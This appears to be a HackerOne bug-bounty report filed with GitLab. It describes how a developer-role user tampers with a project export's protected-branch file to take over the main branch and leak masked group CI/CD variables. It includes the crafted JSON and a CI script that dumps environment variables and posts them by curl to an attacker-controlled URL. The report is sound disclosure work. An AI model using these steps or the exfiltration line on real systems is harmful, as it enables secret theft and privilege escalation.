User with developer role (group) can modify Protected branches setting on imported project and leak group CI/CD variables
HackerOne report #1939987 by js_noob
on 2023-04-09, assigned to @fvpotvin:
Report | Attachments | How To Reproduce
Report
Summary
Hello team, a user with a developer role (group) can steal masked group/project CI/CD variables by modifying Project settings -> Protected branches on an imported project (tree/project/protected_branches.ndjson
file). This is done with no victim interaction needed.
Steps to reproduce
- Create 2 accounts
- Create a group with account A and masked CI/CD group variables (Group settings -> CI/CD -> Variables)
- Create a personal project with account B and export it
- Invite account B (developer) to account A's (owner) group
- With account B, modify the project import file, go to
tree/project/protected_branches.ndjson
- Set all occurrences of
access_level
tonull
and all occurrences ofuser_id
to the developer's user id, it will look similar to this
{"project_id":44833383,"name":"main","created_at":"2023-04-02T13:43:17.065Z","updated_at":"2023-04-02T13:43:17.065Z","code_owner_approval_required":false,"allow_force_push":false,"merge_access_levels":[{"access_level":null,"created_at":"2023-04-02T13:43:17.067Z","updated_at":"2023-04-02T13:43:17.067Z","user_id":12794759,"group_id":null}],"push_access_levels":[{"access_level":null,"created_at":"2023-04-02T13:43:17.069Z","updated_at":"2023-04-02T13:43:17.069Z","user_id":12794759,"group_id":null}],"unprotect_access_levels":[]}
- Tar the changes and upload the modified project to account A's group with account B
- The default access should be to maintainers only however, it is fully accessible by the developer
- Create a
.gitlab-ci.yml
file with the following content
image: ruby:latest
job_name:
script:
- export > test.txt
- curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)
- Commit and verify the group CI/CD variables bring disclosed
For simplicity you can create the vars in step 2 unmasked and in the .gitlab-ci.yml
you have the following content:
image: ruby:latest
job_name:
script:
- echo $VAR
Just to make things easier so we don't require a server.
Reference
Video/POC
Redacted
Impact
Users with developer role (group) can steal masked group and project CI/CD variables. The developer can also modify main
branch without the maintainer's permission.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: